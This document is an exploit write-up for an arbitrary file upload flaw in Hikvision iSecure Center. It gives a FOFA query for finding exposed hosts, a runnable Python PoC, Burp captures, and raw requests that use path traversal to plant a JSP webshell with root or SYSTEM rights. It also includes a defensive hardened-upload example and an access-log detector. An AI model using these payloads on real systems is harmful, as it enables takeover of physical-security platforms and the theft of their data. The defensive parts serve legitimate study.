**2. Vulnerability description**

HIKVISION iSecure Center is an "integrated", "intelligent" comprehensive security management platform. By connecting devices from video surveillance, access-card, parking and alarm-detection systems it collects edge-node data, integrates and links security information, and uses an electronic map as the carrier to combine each subsystem's capabilities into intelligent applications. The platform is designed around a "unified software technology architecture" and uses business componentization so that it can scale elastically. It targets general comprehensive security operations across industries, consolidating and centrally managing the resources of each subsystem for unified deployment, configuration, management and scheduling.

Hikvision iSecure Center has an arbitrary file upload vulnerability.

**3. Affected versions**

HIKVISION iSecure Center, versions seen in the wild (no exact version range is given).

**4. FOFA query**

`icon_hash="-808437027" app="HIKVISION-iSecure-Center"`

## **5. Reproduction**

EXP/POC: the `payload.py` script below. Every request is routed through a proxy at 127.0.0.1:8080 so the traffic can be captured in Burp Suite.

```
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
import requests
import string
import random
import urllib3

urllib3.disable_warnings()

# Route through 127.0.0.1:8080 so the requests can be captured in Burp Suite
proxies = {
    'http': 'http://127.0.0.1:8080',
    'https': 'http://127.0.0.1:8080',
}


def run(arg):
    try:
        # Random marker written into the file, and a random file name, so the
        # check overwrites nothing and the follow-up GET can verify the upload
        flag = ''.join(random.choices(string.ascii_uppercase + string.digits, k=9))
        filename = ''.join(random.choices(string.ascii_uppercase + string.digits, k=10))
        # ';.js' path parameter: Tomcat strips it before routing, while the
        # front end treats the request as a static resource
        vuln_url = arg + "center/api/files;.js"
        # Defined but never passed to requests.post; the capture below therefore
        # shows the default python-requests User-Agent
        headers = {'User-Agent': 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)',
                   'Accept': '*/*',
                   'Content-Type': 'application/x-www-form-urlencoded'}
        # The multipart filename is used unsanitised, so '../' walks up into the
        # Tomcat webapps tree
        file = {'file': (f'../../../../../bin/tomcat/apache-tomcat/webapps/clusterMgr/{filename}.txt', flag, 'application/octet-stream')}
        r = requests.post(vuln_url, files=file, timeout=15, verify=False, proxies=proxies)
        if r.status_code == 200 and "webapps/clusterMgr" in r.text:
            # Fetch the file back through the same ';.js' suffix and look for the marker
            payload = f"clusterMgr/{filename}.txt;.js"
            url = arg + payload
            r2 = requests.get(url, timeout=15, verify=False, proxies=proxies)
            if r2.status_code == 200 and flag in r2.text:
                print('\033[1;31;40m')
                print(arg + f": vulnerable to Hikvision iSecure Center arbitrary file upload\nshell URL: {url}")
                print('\033[0m')
            else:
                print(arg + ": not vulnerable")
        else:
            print(arg + ": not vulnerable")
    except Exception:
        print(arg + ": not vulnerable")


if __name__ == '__main__':
    # Usage: python payload.py https://x.x.x.x/  (keep the trailing slash: paths are concatenated directly)
    url = sys.argv[1]
    run(url)
```
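The script above works because the server joins the client-supplied multipart filename, `../` segments and all, onto its upload directory. The following is an added example (not code from this page or from Hikvision) that shows that flaw next to a hardened handler: the hardened version keeps only the final path component, allow-lists the extension so JSP-family files are never accepted, and verifies after symlink resolution that the destination stays inside the upload root. The directory names, the extension allow-list and the sample attacker filename are hypothetical.

```python
"""
Added example: an unsanitised-filename upload handler beside a hardened one.
All directory names and the extension allow-list are assumptions for illustration.
"""
import os
import tempfile

UPLOAD_DIR_NAME = "uploads"    # hypothetical upload root
WEBAPPS_DIR_NAME = "webapps"   # hypothetical sibling directory an attacker wants to reach


def vulnerable_save(upload_root: str, client_filename: str, data: bytes) -> str:
    """Mirrors the flawed behaviour: trust the multipart filename as given."""
    dest = os.path.join(upload_root, client_filename)
    os.makedirs(os.path.dirname(dest), exist_ok=True)
    with open(dest, "wb") as fh:
        fh.write(data)
    return os.path.realpath(dest)


def hardened_save(upload_root: str, client_filename: str, data: bytes) -> str:
    """Strip directory components, allow-list the extension, pin the result under upload_root."""
    # 1. Keep only the final path component (handle both '/' and '\' separators).
    name = os.path.basename(client_filename.replace("\\", "/"))
    if name in ("", ".", "..") or "\x00" in name:
        raise ValueError("invalid filename")
    # 2. Allow-list the extension; server-executable types must never be accepted.
    ext = os.path.splitext(name)[1].lower()
    if ext not in (".txt", ".png", ".jpg", ".pdf"):
        raise ValueError(f"extension not allowed: {ext}")
    # 3. Resolve symlinks on both sides and check containment.
    root = os.path.realpath(upload_root)
    dest = os.path.realpath(os.path.join(root, name))
    if os.path.commonpath([root, dest]) != root:
        raise ValueError("path escapes upload root")
    with open(dest, "wb") as fh:
        fh.write(data)
    return dest


def demo() -> dict:
    """Run both handlers against a traversal filename; report where each wrote or why it refused."""
    base = tempfile.mkdtemp()
    upload_root = os.path.join(base, UPLOAD_DIR_NAME)
    os.makedirs(upload_root)
    os.makedirs(os.path.join(base, WEBAPPS_DIR_NAME))
    # Constructed attacker input, shaped like the multipart filename in the PoC.
    evil = "../" + WEBAPPS_DIR_NAME + "/shell.jsp"
    result = {}
    result["vulnerable_path"] = vulnerable_save(upload_root, evil, b"<% out.println(1); %>")
    real_root = os.path.realpath(upload_root)
    result["vulnerable_escaped"] = os.path.commonpath([real_root, result["vulnerable_path"]]) != real_root
    try:
        hardened_save(upload_root, evil, b"x")
        result["hardened_error"] = None
    except ValueError as exc:
        result["hardened_error"] = str(exc)
    # A benign name still works, even with a leading traversal component.
    result["hardened_ok_path"] = hardened_save(upload_root, "../notes.txt", b"hello")
    return result


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The containment check in step 3 is what closes the hole even if a later change relaxes step 1; the extension allow-list is what stops the JSP variant in section 6 regardless of where the file lands.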
## **6. Burp Suite capture analysis**

Burp Suite listening on 127.0.0.1:8080 captures two packets: one POST and one GET.

Payload request:

```
POST /center/api/files;.js HTTP/1.1
Host: x.x.x.x
User-Agent: python-requests/2.31.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Length: 258
Content-Type: multipart/form-data; boundary=e54e7e5834c8c50e92189959fe7227a4

--e54e7e5834c8c50e92189959fe7227a4
Content-Disposition: form-data; name="file"; filename="../../../../../bin/tomcat/apache-tomcat/webapps/clusterMgr/2BT5AV96QW.txt"
Content-Type: application/octet-stream

9YPQ3I3ZS
--e54e7e5834c8c50e92189959fe7227a4--
```

**Payload response:**

```
HTTP/1.1 200
Server: openresty/1.13.6.2
Date: Fri, 14 Jul 2023 04:35:23 GMT
Content-Type: application/json;charset=UTF-8
Content-Length: 335
Connection: close
Set-Cookie: JSESSIONID=0A235873FB1C02C345345C0D36A4C709; Path=/center; HttpOnly
Content-Language: en_US
Cache-Control: no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: 0
Content-Disposition: inline;filename=f.txt

{"code":"0","data":{"filename":"../../../../../bin/tomcat/apache-tomcat/webapps/clusterMgr/
```

Then open https://x.x.x.x/clusterMgr/2BT5AV96QW.txt;.js to check whether the upload succeeded.

Both the `;.js` / `;.html` suffixes and the `..;/` segments used below rely on the same Tomcat behaviour: `;` begins a path parameter, which the container drops from each segment before mapping the request, so `/center/api/files;.js` reaches the same handler as `/center/api/files`, while a front-end access check that decides by file extension treats the request as a static resource.

Because the Hikvision platform runs on Tomcat, changing the request body and the filename lets you upload a Godzilla-generated JSP instead of a text file. Both Windows and Linux hosts are affected: on Windows the resulting shell runs as SYSTEM, on Linux as root.

For post-exploitation against Hikvision account and password management, see 海康威视综合安防后渗透利用技巧 (Hikvision integrated security platform post-exploitation techniques).

POC2:

```
POST /center/api/files;.html HTTP/1.1
Host: 10.10.10.10
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary9PggsiM755PLa54a

------WebKitFormBoundary9PggsiM755PLa54a
Content-Disposition: form-data; name="file"; filename="../../../../../../../../../../../opt/hikvision/web/components/tomcat85linux64.1/webapps/eportal/new.jsp"
Content-Type: application/zip

<% JSP webshell %>
------WebKitFormBoundary9PggsiM755PLa54a--
```

**report arbitrary file upload**

```
POST /svm/api/external/report HTTP/1.1
Host: 10.10.10.10
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary9PggsiM755PLa54a

------WebKitFormBoundary9PggsiM755PLa54a
Content-Disposition: form-data; name="file"; filename="../../../../../../../../../../../opt/hikvision/web/components/tomcat85linux64.1/webapps/eportal/new.jsp"
Content-Type: application/zip

<% JSP webshell %>
------WebKitFormBoundary9PggsiM755PLa54a--
```

**Webshell path: /portal/ui/login/..;/..;/new.jsp**
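On the detection side, the request shapes in this section leave a clear trace in the front-end access log even though the multipart body (and so the traversal filename) is not logged: a `;.js` / `;.html` path parameter on an API route, `..;/` segments, and POSTs to the two upload endpoints. The block below is an added example, not code from this page or from Hikvision, that scans nginx/openresty combined-format log lines for those shapes. It approximates Tomcat's per-segment path-parameter stripping to show the analyst the path the container actually mapped. The log format, IP addresses and sample lines are constructed for illustration.

```python
"""
Added example: flag the path-parameter / traversal request shapes used against
iSecure Center in access-log lines. Log format and sample lines are assumptions.
"""
import posixpath
import re
from typing import Dict, List

# nginx/openresty combined log format (assumed); only the fields we need are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)

# Upload endpoints named on this page.
UPLOAD_ENDPOINTS = ("/center/api/files", "/svm/api/external/report")

# ';.js', ';.html', ... glued onto a segment: makes an API call look like a static file.
STATIC_PARAM_RE = re.compile(r";\.(?:js|html|css|png|jpg|gif|ico)(?=/|$)", re.I)


def tomcat_view(path: str) -> str:
    """Path as the servlet container maps it: drop ';...' from every segment, then normalise."""
    raw = path.split("?", 1)[0]
    stripped = "/".join(seg.split(";", 1)[0] for seg in raw.split("/"))
    return posixpath.normpath(stripped)


def classify(method: str, path: str) -> List[str]:
    """Return the reasons a request is suspicious (empty list when it is not)."""
    reasons: List[str] = []
    raw = path.split("?", 1)[0]
    if STATIC_PARAM_RE.search(raw):
        reasons.append("static-looking ';.ext' path parameter")
    if "/..;/" in raw:
        reasons.append("'..;/' traversal segment")
    mapped = tomcat_view(path)
    if method == "POST" and mapped in UPLOAD_ENDPOINTS:
        reasons.append(f"POST to upload endpoint {mapped}")
    if reasons and mapped.lower().endswith(".jsp"):
        reasons.append("resolves to a .jsp resource")
    return reasons


def scan(lines) -> List[Dict[str, str]]:
    """Parse each log line and collect findings with the container-side view of the path."""
    findings: List[Dict[str, str]] = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        reasons = classify(m["method"], m["path"])
        if reasons:
            findings.append({
                "ip": m["ip"],
                "method": m["method"],
                "path": m["path"],
                "status": m["status"],
                "mapped": tomcat_view(m["path"]),
                "reasons": "; ".join(reasons),
            })
    return findings


# Constructed sample log lines (not a real capture) mirroring the requests on this page.
SAMPLE_LOG = [
    '203.0.113.7 - - [14/Jul/2023:04:35:23 +0000] "POST /center/api/files;.js HTTP/1.1" 200 335 "-" "python-requests/2.31.0"',
    '203.0.113.7 - - [14/Jul/2023:04:35:24 +0000] "GET /clusterMgr/2BT5AV96QW.txt;.js HTTP/1.1" 200 9 "-" "python-requests/2.31.0"',
    '203.0.113.7 - - [14/Jul/2023:04:36:01 +0000] "POST /svm/api/external/report HTTP/1.1" 200 120 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [14/Jul/2023:04:36:05 +0000] "GET /portal/ui/login/..;/..;/new.jsp HTTP/1.1" 200 51 "-" "Mozilla/5.0"',
    '198.51.100.2 - - [14/Jul/2023:04:40:00 +0000] "GET /portal/ui/login/index.html HTTP/1.1" 200 4021 "-" "Mozilla/5.0"',
    '198.51.100.2 - - [14/Jul/2023:04:40:01 +0000] "GET /center/static/app.js HTTP/1.1" 200 9001 "-" "Mozilla/5.0"',
]


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f'{f["ip"]} {f["method"]} {f["path"]} -> {f["mapped"]} [{f["status"]}]: {f["reasons"]}')
```

The `mapped` field is the useful part for triage: `/portal/ui/login/..;/..;/new.jsp` collapses to `/portal/new.jsp`, which is why a prefix rule on `/portal/ui/login/` at the reverse proxy never sees the JSP being fetched. A 200 on a finding whose path has a `;` parameter is the signal to pull the corresponding Tomcat access log and the upload directory.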